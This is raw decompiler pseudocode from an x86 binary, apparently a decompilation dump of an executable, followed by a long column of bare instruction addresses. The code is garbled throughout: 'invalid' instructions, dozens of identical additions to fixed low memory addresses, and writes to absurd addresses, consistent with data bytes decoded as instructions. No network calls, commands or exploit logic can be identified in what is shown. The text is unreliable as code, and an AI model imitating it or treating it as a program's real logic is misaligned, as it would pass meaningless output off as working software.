				 *((intOrPtr*)(_t693 + _t758 + 0x40)) =  *((intOrPtr*)(_t693 + _t758 + 0x40)) + _t730;
				 *((intOrPtr*)(_t561 + 0x33)) =  *((intOrPtr*)(_t561 + 0x33)) + _t730;
				_t562 = _t561 + 1;
				 *_t562 = _t730 +  *_t562;
				asm("in al, dx");
				asm("adc [eax], al");
				asm("repne adc [eax], al");
				asm("clc");
				asm("adc [eax], al");
				asm("invalid");
				_t564 = (_t562 ^  *_t562) + 1;
				 *((intOrPtr*)(_t730 + _t744)) =  *((intOrPtr*)(_t730 + _t744)) + _t564;
				_t565 = _t564 + 1;
				 *((intOrPtr*)(_t565 - 0x53ffbfcd)) =  *((intOrPtr*)(_t565 - 0x53ffbfcd)) + _t730;
				asm("enter 0x4033, 0x0");
				_t569 = (_t565 ^  *_t565) + 0x00000001 + _t730 ^  *((_t565 ^  *_t565) + 1 + _t730);
				asm("lock xor eax, [eax]");
				 *((intOrPtr*)(((_t565 ^  *_t565) + 0x00000001 + _t730 ^  *((_t565 ^  *_t565) + 1 + _t730)) + _t569 * 2)) =  *((intOrPtr*)(((_t565 ^  *_t565) + 0x00000001 + _t730 ^  *((_t565 ^  *_t565) + 1 + _t730)) + ((_t565 ^  *_t565) + 0x00000001 + _t730 ^  *((_t565 ^  *_t565) + 1 + _t730)) * 2)) + _t744;
				 *((intOrPtr*)(_t767 + _t758)) =  *((intOrPtr*)(_t767 + _t758)) + _t744;
				 *_t744 =  *_t744 + _t730;
				asm("adc [eax], eax");
				_pop(_t571);
				_t572 = _t571 ^ 0x00000040;
				 *_t572 =  *_t572 + _t744;
				asm("adc [eax], eax");
				_push(ss);
				asm("adc [eax], eax");
				asm("sbb al, 0x11");
				_t573 = _t572 + 1;
				 *((intOrPtr*)(_t573 + 0x34)) =  *((intOrPtr*)(_t573 + 0x34)) + _t573;
				_t574 = _t573 + 1;
				 *_t574 =  *_t574 + _t744;
				_t745 = _t744 &  *_t730;
				_t576 = (_t574 ^  *_t574) + 1;
				 *_t576 =  *_t576 + _t730;
				asm("adc [eax], eax");
				if( *_t576 >= 0) {
					 *_t758 =  *_t758 + _t730;
					asm("adc [eax], eax");
					 *((intOrPtr*)(_t730 + _t745)) =  *((intOrPtr*)(_t730 + _t745)) + _t745;
					_t668 = (_t576 + 0x00000001 ^ 0x00000040) + 1;
					 *((intOrPtr*)(_t668 + 0x3a004034)) =  *((intOrPtr*)(_t668 + 0x3a004034)) + _t693;
					asm("adc [eax], eax");
					asm("adc [eax], eax");
					asm("pushfd");
					_t670 = _t668 + 0x00000001 ^ 0x00000040;
					 *((intOrPtr*)(_t670 + 0x46004034)) =  *((intOrPtr*)(_t670 + 0x46004034)) + _t745;
					asm("adc [eax], eax");
					 *(_t670 + 0x1db40041) =  *(_t670 + 0x1db40041) | _t745;
					_t576 = _t670 + 1;
					 *((intOrPtr*)(_t767 + _t758 + 0x35400040)) =  *((intOrPtr*)(_t767 + _t758 + 0x35400040)) + _t745;
				}
				_t577 = _t576 + 1;
				 *((intOrPtr*)(_t758 + 0x35000040)) =  *((intOrPtr*)(_t758 + 0x35000040)) + _t577;
				_t580 = _t577 + 0x00000001 + _t730 ^ 0x00000040;
				 *((intOrPtr*)(_t730 + 0x40 + _t745)) =  *((intOrPtr*)(_t730 + 0x40 + _t745)) + _t730;
				 *((intOrPtr*)(_t580 + 0x35)) =  *((intOrPtr*)(_t580 + 0x35)) + _t580;
				 *((intOrPtr*)(_t745 + 0x11)) =  *((intOrPtr*)(_t745 + 0x11)) + _t745;
				_t582 = _t580 + 2;
				 *((intOrPtr*)(_t582 + 0x35)) =  *((intOrPtr*)(_t582 + 0x35)) + _t693;
				_t583 = _t582 + 1;
				 *((intOrPtr*)(_t583 + 0x11)) =  *((intOrPtr*)(_t583 + 0x11)) + _t693;
				_t584 = _t583 + 1;
				 *((intOrPtr*)(_t584 - 0x3bffbfcb)) =  *((intOrPtr*)(_t584 - 0x3bffbfcb)) + _t745;
				 *_t584 =  *_t584 ^ _t584;
				asm("movsb");
				_t586 = (_t584 ^ 0x35d00040) + 1;
				 *_t586 =  *_t586 + _t745;
				 *_t586 =  *_t586 ^ _t586;
				asm("in al, 0x35");
				_t587 = _t586 + 1;
				 *((intOrPtr*)(_t587 - 0x7ffbfcf)) =  *((intOrPtr*)(_t587 - 0x7ffbfcf)) + _t730;
				_t589 = (_t587 ^ 0x115e0040) + 1;
				 *((intOrPtr*)(_t730 + 0x40 + _t745)) =  *((intOrPtr*)(_t730 + 0x40 + _t745)) + _t589;
				_t591 = _t589 + _t589 + 1;
				 *_t591 =  *_t591 + _t730;
				 *((intOrPtr*)(_t758 + _t758)) =  *((intOrPtr*)(_t758 + _t758)) + _t693;
				_t593 = _t591 + 2;
				 *_t593 =  *_t593 + _t693;
				 *((intOrPtr*)(_t758 + _t758 + 0x40)) =  *((intOrPtr*)(_t758 + _t758 + 0x40)) + _t693;
				 *((intOrPtr*)(_t745 + 0x11)) =  *((intOrPtr*)(_t745 + 0x11)) + _t730;
				_t595 = _t593 + 2;
				 *((intOrPtr*)(_t595 + 0x11)) =  *((intOrPtr*)(_t595 + 0x11)) + _t745;
				_t596 = _t595 + 1;
				 *((intOrPtr*)(_t758 + _t758 + 0x11760040)) =  *((intOrPtr*)(_t758 + _t758 + 0x11760040)) + _t596;
				_t599 = _t596 + 0x00000001 + _t596 + 0x00000001 ^ 0x00000040;
				 *((intOrPtr*)(_t599 - 0x2fffbfca)) =  *((intOrPtr*)(_t599 - 0x2fffbfca)) + _t745;
				_t600 = _t599 + 1;
				 *((intOrPtr*)(_t750 + _t758)) =  *((intOrPtr*)(_t750 + _t758)) + _t600;
				_t601 = _t600 + 1;
				 *((intOrPtr*)(_t730 + 0x40 + _t745)) =  *((intOrPtr*)(_t730 + 0x40 + _t745)) + _t693;
				 *_t601 =  *_t601 + _t745;
				asm("aaa");
				_t602 = _t601 + 1;
				 *_t602 =  *_t602 + _t602;
				 *_t602 =  *_t602 ^ _t602;
				 *_t602 =  *_t602 + _t602;
				 *_t602 =  *_t602 + _t602;
				 *_t602 =  *_t602 + _t602;
				 *_t602 =  *_t602 + _t602;
				 *_t602 =  *_t602 + _t602;
				 *_t602 =  *_t602 + _t602;
				asm("invalid");
				asm("invalid");
				 *_t602 =  *_t602 + _t602;
				 *_t602 =  *_t602 + _t602;
				asm("insb");
				if( *_t602 > 0) {
					 *((intOrPtr*)(_t758 + 0x7b8c0041 + _t760 * 2)) =  *((intOrPtr*)(_t758 + 0x7b8c0041 + _t760 * 2)) + _t730;
					_t731 =  &(_t730[0]);
					 *((intOrPtr*)(_t731 + 0x41 + _t760 * 2)) =  *((intOrPtr*)(_t731 + 0x41 + _t760 * 2)) + _t693;
					_t663 = _t731 + _t602;
					asm("outsd");
					_t732 =  &(_t731[0]);
					 *((intOrPtr*)(_t663 + 0x4800416c)) =  *((intOrPtr*)(_t663 + 0x4800416c)) + _t732;
					_push(0x72d40041);
					_t733 =  &(_t732[0]);
					 *_t733 =  *_t733 + 0xf0;
					_t665 = _t663 + _t693 + _t663 + _t693;
					_push(0x66fc0041);
					 *((intOrPtr*)(_t745 + _t760 * 2)) =  *((intOrPtr*)(_t745 + _t760 * 2)) + _t665;
					_t602 = _t665 + _t745;
					_push(0x41);
					 *((intOrPtr*)(_t602 + 0x4000416b)) =  *((intOrPtr*)(_t602 + 0x4000416b)) + _t745;
					_t730 =  &(_t733[1]);
					 *((intOrPtr*)(_t602 + 0x6800416d)) =  *((intOrPtr*)(_t602 + 0x6800416d)) + _t730;
				}
				_t605 = _t602 + 1 + _t602 + 1 + 1;
				 *_t605 =  *_t605 + _t605;
				asm("adc [eax], eax");
				_t606 = _t605 ^ 0x00000000;
				 *_t606 =  *_t606 + _t606;
				asm("hlt");
				_t607 = _t606 + 1;
				 *_t730 =  *_t730 + _t607;
				 *_t693 =  *_t693 + _t607;
				 *_t607 =  *_t607 + _t607;
				 *_t607 =  *_t607 + _t607;
				 *_t607 =  *_t607 + _t607;
				 *_t607 =  *_t607 + _t607;
				_t730[0x10] = _t730[0x10] + _t745;
				_t608 = _t607 + _t607;
				_t694 = 0xd4004167;
				 *_t608 =  *_t608 & _t608;
				_t610 = _t608 + 0x30;
				 *_t730 =  *_t730 + _t610;
				 *_t694 =  *_t694 + _t610;
				 *_t610 =  *_t610 + _t610;
				_pop(ds);
				 *_t610 =  *_t610 + _t694;
				 *_t610 =  *_t610 + _t610;
				 *((intOrPtr*)(_t750 + 0x40 + _t760)) =  *((intOrPtr*)(_t750 + 0x40 + _t760)) + _t730;
				_t695 = _t694 + _t694;
				asm("invalid");
				 *_t610 =  *_t610 + 1;
				 *_t610 =  *_t610 + _t610;
				 *_t610 =  *_t610 + _t610;
				 *_t610 =  *_t610 + _t610;
				_t611 = _t610 + _t745;
				 *_t611 =  *_t611 & _t611;
				asm("lock pop ebx");
				 *_t611 =  *_t611 & _t611;
				if( *_t611 >= 0) {
					_t660 = _t611 + 1;
					_t695 = _t695 + _t695;
					asm("invalid");
					 *_t660 =  *_t660 + 1;
					 *_t660 =  *_t660 + _t660;
					 *_t660 =  *_t660 + _t660;
					_t661 = _t660 + 1;
					 *0x300 =  *0x300 + _t661;
					 *_t661 =  *_t661 + _t661;
					 *_t661 =  *_t661 + _t661;
					 *_t661 =  *_t661 + _t661;
					 *((intOrPtr*)(0x40 + _t745)) =  *((intOrPtr*)(0x40 + _t745)) + _t661;
					 *_t661 =  *_t661 + _t661;
					_pop(_t772);
					 *_t661 =  *_t661 & _t661;
					asm("das");
					_t611 = _t772 + 1;
					 *0x40000300 =  *0x40000300 + _t611;
				}
				 *_t730 =  *_t730 + _t611;
				 *_t611 =  *_t611 + _t611;
				 *_t611 =  *_t611 + _t611;
				_t612 = _t611 + 1;
				 *_t758 =  *_t758 + _t612;
				 *_t695 =  *_t695 + _t612;
				 *_t612 =  *_t612 + _t612;
				 *_t612 =  *_t612 + _t612;
				 *_t612 =  *_t612 + _t612;
				 *_t612 =  *_t612 + _t612;
				 *((intOrPtr*)(_t612 + 0x4022)) =  *((intOrPtr*)(_t612 + 0x4022)) + _t612;
				 *_t612 =  *_t612 & _t612;
				asm("pushfd");
				asm("das");
				_t613 = _t612 + 1;
				 *_t758 =  *_t758 + _t613;
				 *_t695 =  *_t695 + _t613;
				 *_t613 =  *_t613 + _t613;
				_t614 = _t613 | 0x00004400;
				 *((intOrPtr*)(_t750 + _t760 + 0x40040)) =  *((intOrPtr*)(_t750 + _t760 + 0x40040)) + _t614;
				_t615 = _t614 +  *_t614;
				 *_t615 =  *_t615 + _t615;
				 *_t615 =  *_t615 + _t615;
				 *_t615 =  *_t615 + _t615;
				 *_t615 =  *_t615 + _t615;
				asm("pushfd");
				asm("adc [ecx], bl");
				 *0x00000060 =  *((intOrPtr*)(0x60)) + 0x30;
				_t620 = 0x30 +  *((intOrPtr*)(0x30)) + 1;
				 *_t730 =  *_t730 + _t745;
				 *_t620 =  *_t620 + _t730;
				 *_t620 =  *_t620 + _t620;
				asm("hlt");
				_t621 = _t620 + 1;
				 *_t695 =  *_t695 + _t621;
				 *_t695 =  *_t695 + _t621;
				 *_t621 =  *_t621 + _t621;
				 *_t621 =  *_t621 + _t621;
				 *_t621 =  *_t621 + _t621;
				 *_t621 =  *_t621 + _t621;
				_t623 = _t621 + _t730 &  *(_t621 + _t730);
				asm("loopne 0x5d");
				 *_t623 =  *_t623 & _t623;
				 *_t695 =  *_t695 + _t623;
				 *_t623 =  *_t623 + _t623;
				asm("adc [eax], eax");
				 *_t623 =  *_t623 + _t623;
				_t625 = _t623 + _t745 + 1;
				 *_t745 =  *_t745 + _t625;
				 *_t695 =  *_t695 + _t625;
				 *_t625 =  *_t625 + _t625;
				 *_t625 =  *_t625 + _t625;
				 *_t625 =  *_t625 + _t625;
				 *_t625 =  *_t625 + _t625;
				 *((intOrPtr*)(_t695 + 0x40)) =  *((intOrPtr*)(_t695 + 0x40)) + _t625;
				_t626 = _t625 + 0x2f;
				 *_t626 =  *_t626 & _t626;
				asm("enter 0x402f, 0x0");
				_t750[9] = _t730 + _t750[9];
				_t630 = (_t626 +  *_t626 +  *((intOrPtr*)(_t626 +  *_t626)) &  *(_t626 +  *_t626 +  *((intOrPtr*)(_t626 +  *_t626)))) + 1;
				 *0xFFFFFFFFDE008047 =  *((intOrPtr*)(0xffffffffde008047)) + _t630;
				_t631 = _t630 & 0x00000040;
				 *((intOrPtr*)(_t750 - 0x30ffbfdd)) =  *((intOrPtr*)(_t750 - 0x30ffbfdd)) + 0x2f;
				asm("iretd");
				asm("jecxz 0x25");
				 *0xf7004023 =  *0xf7004023 + _t730;
				 *_t750 =  *_t750 + 0xf7004023;
				_t636 = (_t631 &  *_t631 &  *(_t631 &  *_t631)) + 0x00000001 & 0x40;
				_t750[9] = _t750[9] + _t636;
				 *0xFFFFFFFFF7004047 =  *((intOrPtr*)(0xfffffffff7004047)) + 0xf7004023;
				 *((intOrPtr*)(_t750 - 0x54ffbfdc)) =  *((intOrPtr*)(_t750 - 0x54ffbfdc)) + _t745;
				 *((intOrPtr*)(_t750 - 0x2cffbfdc)) =  *((intOrPtr*)(_t750 - 0x2cffbfdc)) + 0xf7004023;
				_t641 = _t636 + 2 & 0x40;
				 *_t641 =  *_t641 + _t641;
				 *_t641 =  *_t641 + _t641;
				 *_t641 =  *_t641 + _t745;
				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0x8884063)) + _t745;
				_t643 = _t641 + 2;
				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
				asm("adc [eax], eax");
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0x8884063)) + _t745;
				_t645 = _t643 + 2;
				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
				asm("adc [eax], eax");
				 *_t645 =  *_t645 + _t645;
				 *_t645 =  *_t645 + _t645;
				 *_t645 =  *_t645 + _t645;
				 *_t645 =  *_t645 + _t645;
				 *_t645 =  *_t645 + _t645;
				 *_t645 =  *_t645 + _t645;
				 *_t645 =  *_t645 + _t645;
				 *_t645 =  *_t645 + _t645;
				 *_t645 =  *_t645 + _t645;
				 *_t645 =  *_t645 + _t645;
				 *_t645 =  *_t645 + _t645;
				 *_t645 =  *_t645 + _t645;
				_t647 = _t645 + 0x00000001 & 0x00000040;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *((intOrPtr*)(0x40 + _t647)) =  *((intOrPtr*)(0x40 + _t647)) + _t647;
				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0x8884063)) + _t745;
				_t648 = _t647 + 1;
				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
				asm("adc [eax], eax");
				 *_t648 =  *_t648 + _t648;
				 *_t648 =  *_t648 + _t648;
				 *_t648 =  *_t648 + _t648;
				 *_t648 =  *_t648 + _t648;
				 *_t648 = fs;
				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0x8884063)) + _t745;
				_t650 = _t648 + 2;
				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
				asm("adc [eax], eax");
				 *_t650 =  *_t650 + _t650;
				 *_t650 =  *_t650 + _t650;
				 *_t650 =  *_t650 + _t650;
				 *_t650 =  *_t650 + _t650;
				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0x8884063)) + _t745;
				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
				asm("adc [eax], eax");
				 *0x00000022 =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(0x22)) =  *((intOrPtr*)(0x22)) + 0x22;
				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0x8884063)) + _t745;
				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
				asm("adc [eax], eax");
				 *0x00000024 =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
				 *((intOrPtr*)(_t760 + 0x8884063)) =  *((intOrPtr*)(_t760 + 0xffffffffff888086)) + _t745;
				 *((intOrPtr*)(_t758 - 0x6bffbfef)) =  *((intOrPtr*)(_t758 - 0x6bffbfef)) + _t730;
				asm("adc [eax], eax");
				 *0x00000047 =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				 *((intOrPtr*)(0x47)) =  *((intOrPtr*)(0x47)) + 0x47;
				0xb8(0x40119a);
			}















































































































































































































                    0x004011a8
                    0x004011a8
                    0x004011a8
                    0x004011a8
                    0x004011a8
                    0x004011a8
                    0x004011a8
                    0x004011a8
                    0x004011a9
                    0x004011a9
                    0x004011a9
                    0x004011aa
                    0x004011ad
                    0x004011b2
                    0x004011b4
                    0x004011b6
                    0x004011b8
                    0x004011ba
                    0x004011bc
                    0x004011bd
                    0x004011bf
                    0x004011c1
                    0x004011c3
                    0x004011c9
                    0x004011cf
                    0x004011d2
                    0x004011d8
                    0x004011da
                    0x004011dc
                    0x004011de
                    0x004011e0
                    0x004011e3
                    0x004011e6
                    0x00000000
                    0x00000000
                    0x004011e8
                    0x004011ea
                    0x004011f1
                    0x004011f4
                    0x004011f6
                    0x004011f8
                    0x004011fa
                    0x004011fc
                    0x004011fd
                    0x004011fe
                    0x00000000
                    0x00401200
                    0x00401200
                    0x00401201
                    0x00401202
                    0x00401204
                    0x00401205
                    0x00401206
                    0x00401208
                    0x0040120a
                    0x0040120f
                    0x00000000
                    0x00401211
                    0x00401211
                    0x00401214
                    0x0040121a
                    0x00401220
                    0x00000000
                    0x0040120f
                    0x00401225
                    0x00401227
                    0x0040122d
                    0x0040122f
                    0x00401231
                    0x00401233
                    0x00401235
                    0x00401237
                    0x00401239
                    0x0040123b
                    0x0040123d
                    0x0040123f
                    0x00401241
                    0x00401243
                    0x00401245
                    0x00401247
                    0x00401249
                    0x0040124b
                    0x0040124d
                    0x0040124f
                    0x00401251
                    0x00401253
                    0x00401253
                    0x00000000
                    0x004011fe
                    0x00401256
                    0x00401258
                    0x0040125a
                    0x0040125c
                    0x0040125d
                    0x0040125e
